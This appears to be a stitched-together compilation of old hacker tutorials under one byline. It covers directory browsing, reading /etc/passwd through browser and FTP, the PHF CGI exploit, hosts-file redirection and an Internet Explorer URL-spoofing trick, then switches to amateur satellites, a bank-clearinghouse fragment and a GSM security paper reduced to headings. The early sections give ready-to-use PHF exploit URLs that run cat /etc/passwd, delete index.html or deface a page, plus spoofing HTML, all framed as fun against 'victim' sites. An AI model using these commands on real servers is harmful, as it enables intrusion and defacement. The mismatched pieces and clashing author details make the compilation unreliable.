How to Explore the Insides of Internet Computers -- from your Browser!
By Kumar Gaurav,B.Tech(E.C.E),New Delhi.

Figure 1: An ordinary view of a web site. But we aren't ordinary web surfers, muhahaha! To see better detail, with Windows right click on this (or any other image in your browser) and select "view image". Figure 1 shows a normal page in the directory /support/csr/software, viewing a file named csr_software.htm. Now here's how we can see everything else in this directory. Simply delete the file name and now you have the URL http://www.victimone.com/support/CSR/software/. Then hit enter in the location bar and we get:

Figure 2: Here's how us extraordinary web surfers explore web sites.

More How to Explore the Insides of Internet Computers -- from your Browser!

Figure 5: Reading the code for a CGI program on an Irix 6.2 webserver (as shown under a Netscape browser running on Windows NT).
This technique for viewing directory contents will not work on all web sites.  There are two easy ways a webmaster can keep you from viewing directory listings.  One is to put a file named index.html (or whatever the webserver is configured to use for a default page when a file is not specified) in each directory.  In that case, all you will see is the index page and not the directory.  The other way is to configure your web server to deny directory listings.
If you are lucky, you may be able to discover that one web server is actually running many web sites.  For example, something that will sometimes work is http://www.victim.com/../usr/local/apache/htdocs/. However, the webmaster may have put all the web sites elsewhere, for example http://www.victim.com/var/www/htdocs/. If you are patient, just try guessing cool directory paths and see what you get.
How to Explore beyond Web Site Directories into Hidden Parts of the Computer
Exploration using http:// attacks can get boring fast.  Ftp (file transfer protocol) comes to the rescue.  If the web site you are exploring offers downloads, chances are you can get amazing results with something like ftp://www.victim.com.
First, let's take a look at what happens if you can't get in using the ftp trick

Figure 6: A failed attempt to ftp into a webserver.

More How to Explore the Insides of Internet Computers -- from your Browser!
You are probably dying to see what's in passwd.  I'm going to be cruel and first force you to learn about group.  OK, OK, I know you can just skip ahead to passwd, but pretty please calm down and look over group first.

Figure 11. The file /etc/group, viewed with Internet Explorer 4.0.
Newbie note:  What does root::0:root mean?  Root is the name of a Unix group.  Each file and directory in a Unix computer has two owners, one a user and the other a group.  One's power to use, write and read a file or directory is dependent on under what user name you login, and on what group you are.  In this case the number zero is the numerical identification (ID) of group root.  Normally group ID 0 is reserved for group root or group wheel.  (I prefer to set up a group wheel for the uberpowerful users on my boxen.) On this computer there is only one user -- root -- in group root.  Group sys looks like another group, adm, is a member. However, only user names are members of groups.  In this case adm is both a user name and a group name.  The groups and user names sys, adm, uucp and so on are all used not by people, but by programs which need rights to use other programs. 
Evil genius tip: The only user name that looks like it is used by a human on this box is root.  This tells us that the sysadmin is careless.  You should always set up an account with lower privileges than root on any Unix computer and do most of your work from that account. The worst problem with having root as your only user account is that then you are forced to login as root.  This makes the root account vulnerable to password guessing.
What else is /etc/group good for?  Let's take a look at another group file:

Figure 12: Another /etc/group
In this case we see a group named bsdi.  This tells us the operating system this computer uses is BSDI.  You can learn more about it at http://www.bsdi.com.

More How to Explore the Insides of Internet Computers -- from your Browser!
Now you finally get to read about /etc/passwd.  

Figure 13. The file /etc/passwd shown in Netscape under Windows 98.
Don't get too excited! This is just a shadowed password file.  
Newbie note: "/etc/password" is the name of the password file under many Unix-type operating systems such as Linux or Solaris.  When you login to a shell account on this type of computer, when you give your user name and password, the operating system goes to /etc/passwd to find out whether you are allowed to login. 
Evil Genius Tip: If you get a password file that includes encrypted passwords, you can use a program such as Crack to extract passwords.  However, if the passwords have been chosen well, no program will be able to crack their encryption.  An uncrackacble password would typically be at least 8 characters long, include both upper case and lower case letters of the alphabet, numbers, and other characters such as !@#$%^&*()<>?.
You can go to jail warning!  If you crack a password file, mere possession of the cracked passwords can get you into trouble with the law.  To see what "Club Fed" (the destination for so many crackers) is all about, click here.
Evil genius tip: Even a shadowed /etc/passwd file can sometimes be used to break into a computer. With a list of all user names and the knowledge of which of these can spawn a shell, one may use password guessing.  This is often far slower than running the encrypted passwords though a program such as crack, but works surprisingly often.
What else can you do once you are inside your victim?  You can download programs!  For example:

Figure 14.  Downloading the program "ls" (list files) from a victim computer.
What is this good for?  If you are an evil genius type, you could analyze programs on victim.com for ways to break in.  In the example above, downloading "ls" won't do much good.
More How to Explore the Insides of Internet Computers -- from your Browser!

Figure 17:  We guessed that the file /etc/group exists and voila!  It turns up on our browser. 
As you can see, guessing worked! From the above very short group file we can guess it uses NIS authentication.  Under this system, many computers share the same password authentication system on a central computer.  Then only user names required to run programs on that computer will be in the password file.  We confirm this when we look at the passwd file and only find five entries.
Oh, yes, the same thing will work for guessing /etc/passwd and many other file names.
How to Break into Computers Using Only your Web Browser
You may have have already read about the PHF exploit. Just in case you are the one hacker in a million who hasn't already read about this, here's how most people try the PHF attack.  In the location window of your browser, simply insert the command
http://victim.computer.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You can get punched in the nose warning:  While it isn't illegal to run this command, many webservers automatically email a complaint about you to your online service.  Oh, yes, they can tell who you are really easily.  Many online services will automatically terminate your account if they catch you running the PHF exploit.
Usually you will only get a response that looks like Figure 18:

Figure 18: The usual result of trying the PHF exploit. Sometimes insults and threats will appear instead. Webmasters hate people who try the PHF exploit.
Use of this command is proof of idiocy. One day, looking over the logs of attacks on the ANY web server, I was appalled to see that almost every PHF attack used the above line of code. 
If this attack had worked, these pitiful excuses for hackers would have gotten nothing of much value.  Our password file is shadowed, and in any case the passwords were all way too brutal to be extracted by any cracking program.  
The real power of the PHF attack is that if it works, you already have root control over the victim computer -- through your web browser. So why bother cracking the password file?  For example, if we were lame enough to run a webserver vulnerable to PHF attack, you could give the command: 
http://<xyz.com>/cgi-bin/phf?Qalias=x%0a/bin/rm%20<document root>index.html
If it works, this would erase the main web page of whatever web site was hosted at that particular document root. Or the command could have been echo%20”You got hacked, luser!”><document root>index.html.  (Note that %20 represents a space in the command string.)  This would add the phrase "You got hacked, luser!" to the victim web site.

How to *LEGALLY* Deface Web Sites (Honest! Would I lie to you?)
By Kumar Gaurav,B.Tech(E.C.E), India Cyber Army ,New Delhi.

____________________________________________________________
OK, OK, just kidding. This Guide is really about how to fool your
friends into thinking you have defaced a web site. You can do this by
tricking the computer of your victim, er, friend into showing a false
web address. It's so easy, even a beginner can pull off these tricks.
In this Guide you will learn:
* How to alter a computer to which you have access so that anyone who
uses it will be tricked, muhahaha!
* How to set up a button on your web page that tricks someone who uses
Internet Explorer into thinking you defaced the CIA web site.
* How to send an email attachment that tricks someone who uses
Internet Explorer into thinking you defaced the CIA web site.
* Plus, an uberhacker bonus, how to forge email so you can insert
weird hidden codes into it.
Even if you don't like to play practical jokes, it's still worthwhile
to understand how easy it can be to trick someone into thinking they
are viewing a different web site from the actual one. What if you are
buying something online? To whom are you *really* giving your credit
card information? To whom are you *really* giving your online banking
information?
__________________________________________________
* How to alter a computer to which you have access so that anyone who
uses it will be tricked, muhahaha!
__________________________________________________
The easiest way to trick someone into thinking you have defaced a web
site is if you have access to his or her computer (or can get them to
use yours) and can edit the hosts file. Whether the victim computer is
a Mac, Windows, Linux or almost any other operating system, it should
have a file named "hosts". In Windows XP and 2000 it is in
C:/windows/system32/drivers/etc/. In Linux it is in /etc.
If you open the hosts file in an editing program such as Notepad, it
will look something like this:
# © (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host
name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
Now add on to it:
206.61.52.30 www.cia.gov
Get online, type http://www.cia.gov into the location window of your
browser, and you will get the Happyhacker.org web page, while the
location bar says http://www.cia.gov!
OK, so you want to pick a really rank web page to display instead of
our friendly Happyhacker page. How do you find the number that you put
in front of www.cia.gov?
If you have Windows XP, 2000, 2003, Mac OSX, Linux or any kind of
Unix, the answer is easy. If you have a Mac or Linux, bring up a
terminal or shell window. In Windows, click , click Start --> All
Programs --> Accessories --> Command prompt. (Or search for a file
named command.com or cmd.exe and run it.) Then type:
ping rottendisgustingsite.com
Pinging rottendisgustingsite.com [216.999.248.174] with 32 bytes of
data:
That gives the numerical address you need, in this case
216.999.248.174.
______________________________________________________________________
Newbie note: What do those numbers mean? They are Internet addresses,
usually called "IP addresses." They are kind of like phone numbers
used to reach computers over the Internet. When you enter a domain
name (happyhacker.org is an example of a domain name) into the window
of your browser, your computer has to look up the number to which it
corresponds in order to contact it, kind of like looking in a phone
book. In the cases above I messed up the IP addresses by putting 999's
so that lots of people wouldn't attack those IP addresses. Real IP
addresses only contain numbers between the periods of up to 254.
______________________________________________________________________
What if you want to create your own "hacked" web site at one of those
free web hosting places? How do you redirect a computer to your exact
page? Let's say it's at http://www.freewebsites.com/~mysite/. Tell
your friend that you hid a hacked page at http://www.cia.gov/~mysite/.
Then direct the IP address for freewebsites.com to www.cia.gov. When
she or he types in http://www.cia.com/~mysite/ she will see your own
web page.
There is one case in which this hack won't work: if the computer on
which you play this trick uses a proxy server. This is common in large
organizations as a security measure. So be sure to test your hack
before showing it off!

*** How to set up a button or link on your web page that tricks someone who uses Internet Explorer into thinking you defaced a web site.
__________________________________________________
What if you can't alter the hosts file of your friend's computer? As of today, an easy way to spoof URLs is to exploit a flaw in Internet Explorer versions up to 6.0. You can test for this flaw athttp://happyhacker.org/defend/test.shtml . Note: some antivirus programs will claim that this test is a virus. That is not true. They merely are reacting to the fact that it is an attempt to spoof a URL, and are not well enough programmed to tell you it is a URL spoof instead of a virus. If your browser is vulnerable, a link on that page will take you to what looks like http://www.nsa.gov. If your browser is OK, it will show you that this page is actually http://www.happyhacker.org/defend/fakems.htm . The Opera browser will warn you about spoofed URLs (see http://www.opera.com). TSome browsers will partially show a faked URL, usually as http://www.nsa.gov%01@happyhacker.org/defend/fakems.htm.
Now the trick is to somehow get your friend to click on a button you have created to get him or her to go to your "hacked" web site. How does this work? The code for the funny button on this web page is:
<button
onclick="location.href=unescape('http://www.nsa.gov%01@happyhacker.org'/defend/fakems.htm');"
style="font: 8pt verdana, sans-serif;">
<B>Test Exploit</B> </button>
If you have a web site, here is code you can upload that will make a web page that carries your boast about defacing a web site:
<HTML>
<HEAD>
<TITLE>Trick web page</TITLE>
</HEAD>
<BODY>
<BODY BGCOLOR="#ffffff">
<button
onclick="location.href=unescape('http://www.cia.gov%01@happyhacker.org');"
style="font: 12 pt Comic Sans MS">
<B>Click here for proof that I hacked the CIA web page!!!!</B>
</button>
</BODY>
</HTML>
Anyone who has a vulnerable browser will click on it and get the Happy Hacker web site, but the location bar in the browser will say http://www.cia.gov. Of course you could connect to a page on your own web site where you can plaster the childish, ungrammatical, misspelled boasts of the typical web site defacer. For examples of defaced web sites that you can use as, ahem, style guides, seehttp://www.zone-h.org.
Unless you can include the character between gov and % that probably shows up in your browser as a box, this is not a perfect hack. Without that funny character, if your friend looks at the bottom of the browser, he or she can see a briefly displayed message, "Opening page http://www.cia.gov%01@happyhacker.org…" However, if your friend is on a broadband connection, this message will flash by too fast to read. Aw, shucks.
__________________________________________________
Evil genius tip: How do you embed that funny character on your web page? Hint: find an editor that works with Unicode, and doesn't try to do a whole bunch of extra stuff (like MS Word does). __________________________________________________
GaNt points out that there is another way to make a phoney link. Actually several other ways. "By using the href="#" the link is now activated to point to itself. The onClick will be able to activate because the link will not leave the page.
It would be a really good idea to change the status bar as well, so I put that code into it, too."

Satellite Hacking
By Kumar Gaurav,B.Tech(E.C.E),New Delhi.

In this Guide you will learn about:

* Who can help you learn how to build your own satellite, and get it launched into orbit.
* How to get taken seriously when you ask for help
* Examples of universities where you can learn how to build your own
* Conferences devoted to small and amateur satellites
* Pirate radio and the legal alternatives
* How to become a radio amateur hero
* How to break into satellites (not!)
____________________________________________________________

For real hackers (as opposed to computer criminals who call themselves hackers), satellite hacking is about building your own, getting them launched, and using them. Furthermore, believe it or not, the world's first communications satellite was built by a group of radio amateurs. They were real hackers in the truest sense of the word.
____________________________________________________________

*** Who Can Help You
____________________________________________________________

If you want to build your own space satellite, get it launched, and use it to do fun things, your best bet is to join the Radio Amateur Satellite Corporation, http://www.amsat.org, a nonprofit worldwide group.
The Amsat people launched their first home-built satellite, OSCAR I, on December 12, 1961. Amazingly enough, it was the first satellite that wasn’t built by the governments of the U.S. or the former Soviet Union (now Russia). Furthermore, it was only four years after the first satellite launch in history (the Soviet Sputnik I), and long before the first commercial satellites. Amsat managed to get it launched by persuading the U.S. Air Force to carry it piggyback into orbit along with the Discover 36 military satellite. OSCAR I was a simple test satellite that broadcasted a message in Morse code of "HI-HI" over the VHF 2 meter band (144.983 MHz). Over five hundred amateurs in 28 countries reported receiving its signals before its orbit decayed and it re-entered the atmosphere on January 1, 1962.
OSCAR III was Amsat’s first true communications satellite. On March 9, 1965, the U.S. Air Force gave Amsat a piggyback launch, this time along with seven military satellites.  OSCAR III relayed voice contacts in the VHF 2 meter band (146 MHz uplink and 144 MHz downlink). OSCAR III's transponder lasted 18 days. During this time, over 1000 amateurs in 22 countries used it to talk with each other.
____________________________________________________________
Newbie notes: Hz stands for Hertz, meaning cycles per second. VHF stands for Very High Frequency radio waves. VHF frequencies are also often called short wave radio.  Sometimes radio waves are measured by length of the waves, for example 2 meter band instead of by frequency (Hz). Morse code is a means of communicating by simply sending short and long noises: dots and dashes with the dashes represented by a noise three times as long as a dot.  Most famously, the distress signal SOS is represented in Morse code by dot dot dot, dash dash dash, dot dot dot. Seehttp://dict.die.net/morse%20code/ for more details.

*** How to Get Taken Seriously
____________________________________________________________

You can't just talk the Amsat people into launching a satellite for you. You can't even join a design team unless you can show you are worthy of respect.
First of all, you need to become a hard-core amateur radio operator.  A good start is to get the knowledge you need to pass the licensing tests, and aim for the highest level license available in your country. A good resource for learning how to get your licenses is available at http://www.arrl.org/hamradio.html
Beyond that, to become really hard core, you need a degree in engineering, ideally electrical engineering (EE) or aerospace engineering. To learn more about becoming an EE, see the international organization to which most EEs belong, the IEEE (http://www.ieee.org).  They have student chapters and local groups in almost every nation and major city. If you feel stranded in your EE college program, if you are afraid you might not make it, you probably will be able to get help from a mentor in a local IEEE chapter. Also, local chapters are a great way to make friends.

*** Universities Where You Can Learn How to Build Your Own Satellites
____________________________________________________________

You can get an idea of which colleges and universities would be best for you by asking Amsat members for recommendations. For example, in the United Kingdom, Amsat members hold their annual meetings at the University of Surrey (http://www.surrey.ac.uk/), where students have built some of the world's most innovative amateur satellites.
Important note for women: some engineering schools are hostile (perhaps unwittingly) to women. If the other students exclude you from study groups, and if the professors are unfriendly, you will find the going to be much harder. Before choosing your school, be sure to talk with some of the professors and any women engineering majors. If there aren't any women in the department, watch out, because there is a reason for this. On the other hand, if you decide to be their only (or first) woman student, you can become a heroine by helping the professors and other students see that women, just like men, can do serious intellectual work.
The University of Arizona (http://www.arizona.edu) has a Planetary Science department that has built instruments for many satellites; its Optical Sciences department has built optical systems for surveillance satellites; and it has departments of Electrical and Computer Engineering, and Aerospace and Mechanical Engineering. That's where I got my master's degree in industrial engineering (which is cross disciplinary with all engineering fields). The opportunities were awesome and the professors did much to encourage women.
Carnegie Mellon (http://www.cmu.edu/) is one of the best universities for women who want engineering degrees, but it lacks satellite design expertise.
One of the most awesome places to get an engineering degree with emphasis on space satellites is the Utah State University, http://www.usu.edu/. Its Space Dynamics Laboratory http://www.sdl.usu.edu/ builds research satellites and components for other ultra-high technology satellites, for example the upcoming giant James Webb space telescope. They hire students! However, you may need a security clearance to work on some of their hardware or software. Also, the culture there is overwhelmingly Mormon, a religion that encourages women to stay home and raise lots and lots of children. Groan.
One final note. Most engineering professors like it when students come to their offices to talk about fun engineering projects instead of complaining about tests and homework. I got lots of free extra education by taking advantage of chats with professors, and reading the books and papers they recommended to me. If you make friends with professors this way, they can help you get an awesome job when you graduate.

***  Conferences Devoted to Small and Amateur Satellites
____________________________________________________________

You can meet people who share your enthusiasms and learn about the leading edge of technology by going to satellite conferences. Amsat holds meetings and conferences around the world; see its website, http://www.amsat.org, or the websites of the various national chapters, all linked from http://www.amsat-france.org/famsat-inter.htm. Another great one is Utah State University's annual Small Satellite Conference, seehttp://www.smallsat.org/.
____________________________________________________________

*** Pirate Radio and the Legal Alternatives
____________________________________________________________

The movie "Pump up the Volume" features a high school boy who alters his short wave radio equipment to broadcast on commercial wavelengths. As the movie ends, he gets soooo busted! You may have encountered some of these radio pirates yourself. They drive around in pickup trucks, park in obscure locations, broadcast briefly, and then move on, hoping to keep one jump ahead of the police.
Pirate radio can appear tempting, like hacking on steroids. However, almost all radio amateurs detest and disrespect radio pirates. They know that it doesn't take genius to steal the commercial airwaves. If you want your friends to hear your broadcasts, tell them to buy radios designed to also receive shortwave transmissions, for these include the frequencies that you, as an amateur, can use for your broadcasts. These radios are cheap and open up a planet's-worth of fun. The wonderful thing about the wavelengths available to amateurs is that they tend to bounce off the ionosphere (the upper, ionized layer of the atmosphere). So when conditions are right, and if your receiver and transmitter are good enough, you can send and receive radio communications worldwide without even relaying through an OSCAR satellite.
Even more fun, show your friends how to get the no-brainer version of the amateur licenses and then you can enjoy radio chat groups together. In the U.S., the no-brainer license is called "Technician Class." All they have to do to get the license is answer 35 multiple choice questions. See http://www.arrl.org/hamradio.html for details.
____________________________________________________________

*** How to Become a Hero with Amateur Radio
____________________________________________________________

In New Mexico, if you are a licensed radio amateur, you have the right to disregard zoning laws and protesting neighbors and erect gigantic radio transmission towers at your home.  You may have seen some of these towers where you live, typically you’ll see a modest little home and out behind is a tall skinny metal tower with guy wires and funny trusses and shapes sticking out from it. Or you might have noticed someone on a motorcycle with outrageous antennas swaying in the wind as he or she whizzes by: a mobile amateur radio broadcasting station!
The reason the authorities generally love licensed radio amateurs is because they save lives. When disaster strikes, radio amateurs fire up their electrical generators and provide emergency communications for local rescue teams. They also have ground-based repeaters that enable them to patch their radio transmissions into the Internet and phone system at distant locations outside of the zone of destruction.



*** How to Break into Satellites: Not!
____________________________________________________________

Unless you have millions of dollars and a team of engineers, you have no hope of taking over commercial or governmental satellites. You may have encountered boasts from hackers that they move satellites around and toy with their transmissions. If so, they were lying.  In reality, communications satellites are too well guarded. They receive their commands through dedicated radio transmission systems, and the antennas these transmissions require are huge and expensive. This is because it is important to focus the satellite control beam tightly, and it takes large antennas to do this.
So unless you build a sufficiently similar system, overpower their satellite control channel link, figure out how to spoof their transmissions, and determine what their proprietary commands must be -- well, it just isn't going to happen.
If someone did put together the power to try such a stunt, they would be more likely to damage a satellite than take it over. Dan Veeneman, speaking at Def Con IV, illustrated the danger by citing a case in which the legitimate operator of the AMSC-1 communications satellite accidentally damaged it "soon after launch by inadvertently overloading one of the on-board amplifiers."
Clearly, if a hacker were to damage a satellite by beaming break-in attempts at it, he or she would wind up with a loooong stay behind bars. And, yes, anyone trying such a stunt would be easy to catch. The power required to attempt a satellite takeover would be easy to detect. (Think NSA radio frequency snooping satellites!)


** Conclusion
____________________________________________________________

If you want to control space satellites, it is far easier and more fun to build your own than to try to break into other peoples’ satellites. That's what I say!
OK, OK, maybe some of you readers are wondering why you should pay attention to me. Answer: I m doing  hard work to get an engineering degree !!

How to Break into Banks – without Breaking the Law.
By Kumar Gaurav,B.Tech(E.C.E),New Delhi.

Relationship between Clearinghouses and Secure Electronic Transactions (SET) Protocol Figure 1: How the settlement system transfers funds from one bank to another through a clearinghouse (yellow oval).i When someone deposits a check at a bank that is different from the one used by the person who wrote the check, the payee’s bank sends the check to the payer's bank. The actual transfer of funds is made a settlement system. In the United States, the Federal Reserve (the FedWire service) and several private clearinghouses provide settlement services. Then along came the Internet and ecommerce. In February of 1996, Visa and MasterCard announced joint support of a new protocol, Secure Electronic Transactions (SET), for Internet credit card transactions. SET can operate in real time, which is essential for ecommerce, or where there are delays in the system, as in emailed transactions. Automated Clearinghouse (ACH) transfers use a network of computerized processing centers, often run by the Federal Reserve, to transfer funds between ACH member institutions. ACH transfers take longer than FedWire transfers, do not make funds immediately available, but cost less. ACH transfers may be returned, but FedWire transfers are final.

GSM Security and Encryption.

1.0 Introduction

2.0 Overview of GSM

• Total Mobility: The subscriber has the advantage of a Pan-European system allowing him to communicate from everywhere and to be called in any area served by a GSM cellular network using the same assigned telephone number, even outside his home location. The calling party does not need to be informed about the called person's location because the GSM networks are responsible for the location tasks. With his personal chipcard he can use a telephone in a rental car, for example, even outside his home location. This mobility feature is preferred by many business people who constantly need to be in touch with their headquarters.
• High Capacity and Optimal Spectrum Allocation: The former analog-based cellular networks had to combat capacity problems, particularly in metropolitan areas. Through a more efficient utilization of the assigned frequency bandwidth and smaller cell sizes, the GSM System is capable of serving a greater number of subscribers. The optimal use of the available spectrum is achieved through the application Frequency Division Multiple Access (FDMA), Time Division Multiple Access (TDMA), efficient half-rate and full-rate speech coding, and the Gaussian Minimum Shift Keying (GMSK) modulation scheme.
• Security: The security methods standardized for the GSM System make it the most secure cellular telecommunications standard currently available. Although the confidentiality of a call and anonymity of the GSM subscriber is only guaranteed on the radio channel, this is a major step in achieving end-to- end security. The subscriber’s anonymity is ensured through the use of temporary identification numbers. The confidentiality of the communication itself on the radio link is performed by the application of encryption algorithms and frequency hopping which could only be realized using digital systems and signaling.
• Services: The list of services available to GSM subscribers typically includes the following: voice communication, facsimile, voice mail, short message transmission, data transmission and supplemental services such as call forwarding.

2.1 GSM Radio Channel

2.2 TDMA Frame Structures, Channel Types, and Burst Types

Figure 1 TDMA Frame Structures

Figure 2 Normal Burst Structure

2.3 Speech Coding, Channel Coding, and Interleaving

3.0 Overview of Cryptography

3.1 Symmetric Algorithms

C=Ex(P)
  P=Dx(C)
  P=Dx(Ex(P))

3.1.1 Block Ciphers

3.1.2 Stream Ciphers

Figure 3 Four-Stage Linear Feedback Shift Register

3.2 Public Key Algorithms

C=Epub(P), P=Dpriv(C)
  C=Epriv(P), P=Dpub(C)

3.3 One-Way Hash Functions

4.0 Description of GSM Security Features

Figure 4 Distribution of Security Features in the GSM Network

4.1 Authentication

Figure 5 GSM Authentication Mechanism

4.2 Signaling and Data Confidentiality

Figure 6 Ciphering Key Generation Mechanism

Figure 7 Ciphering Mode Initiation Mechanism

4.3 Subscriber Identity Confidentiality

Figure 8 TMSK Reallocation Mechanism

5.0 Discussion

5.1 GSM Encryption Algorithms

• A5 is a stream cipher consisting of three clock-controlled LFSRs of degree 19, 22, and 23.
• The clock control is a threshold function of the middle bits of each of the three shift registers.
• The sum of the degrees of the three shift registers is 64. The 64-bit session key is used to initialize the contents of the shift registers.
• The 22-bit TDMA frame number is fed into the shift registers.
• Two 114-bit keystreams are produced for each TDMA frame, which are XOR-ed with the uplink and downlink traffic channels.
• It is rumored that the A5 algorithm has an "effective" key length of 40 bits.

5.2 Key Length

5.3 Export Restrictions on Encryption Technology

6.0 Conclusion

7.0 Acronyms

A3

Authentication Algorithm

A5

Ciphering Algorithm

A8

Ciphering Key Generating Algorithm

AMPS

Advanced Mobile Phone System

AUC

Authentication Center

BS

Base Station

CBC

Cipher Block Chaining

CEPT

European Conference of Post and Telecommunication Administrations

CFB

Cipher Feedback

CKSN

Ciphering Key Sequence Number

DES

Data Encryption Standard

DSA

Digital Signature Algorithm

ECB

Electronic Code Book

ETSI

European Telecommunications Standards Institute

GMSK

Gaussian Minimum Shift Keying

GSM

Group Special Mobile

HLR

Home Location Register

IMSI

International Mobile Subscriber Identity

Kc

Ciphering Key

Ki

Individual Subscriber Authentication Key

LAI

Location Area Identity

LFSR

Linear Feedback Shift Register

MoU

Memorandum of Understanding

MS

Mobile Station

MSC

Mobile Switching Center

NIST

National Institute of Standards and Technology1

OMS

Operation and Maintenance Subsystem

RAND

Random Number

RSA

Rivest, Shamir, Adleman

SHA

Secure Hash Algorithm

SRES

Signed Response

TACS

Total Access Communications System

TMSI

Temporary Mobile Subscriber Identity

VLR

Visitor Location Register

References

1. Van der Arend, P. J. C., "Security Aspects and the Implementation in the GSM System," Proceedings of the Digital Cellular Radio Conference, Hagen, Westphalia, Germany, October, 1988.
2. Biala, J., "Mobilfunk und Intelligente Netze," Friedr., Vieweg & Sohn Verlagsgesellschaft, 1994.
3. Cooke, J.C.; Brewster, R.L., "Cyptographic Security Techniques for Digital Mobile Telephones," Proceedings of the IEEE International Conference on Selected Topics in Wireless Communications, Vancouver, B.C., Canada, 1992.
4. European Telecommunications Standards Institute, Recommendation GSM 02.09, "Security Aspects".
5. European Telecommunications Standards Institute, Recommendation GSM 02.17, "Subscriber Identity Module".
6. European Telecommunications Standards Institute, Recommendation GSM 03.20, "Security Related Network Functions".
7. Hodges, M.R.L., "The GSM Radio Interface," British Telecom Technology Journal, Vol. 8, No. 1, January 1990, pp. 31-43.
8. Hudson, R.L., "Snooping versus Secrecy," Wall Street Journal, February 11, 1994, p. R14
9. Schneier, B., "Applied Cryptography," J. Wiley & Sons, 1994.
10. Williamson, J., "GSM Bids for Global Recognition in a Crowded Cellular World," Telephony, vol. 333, no. 14, April 1992, pp. 36-40.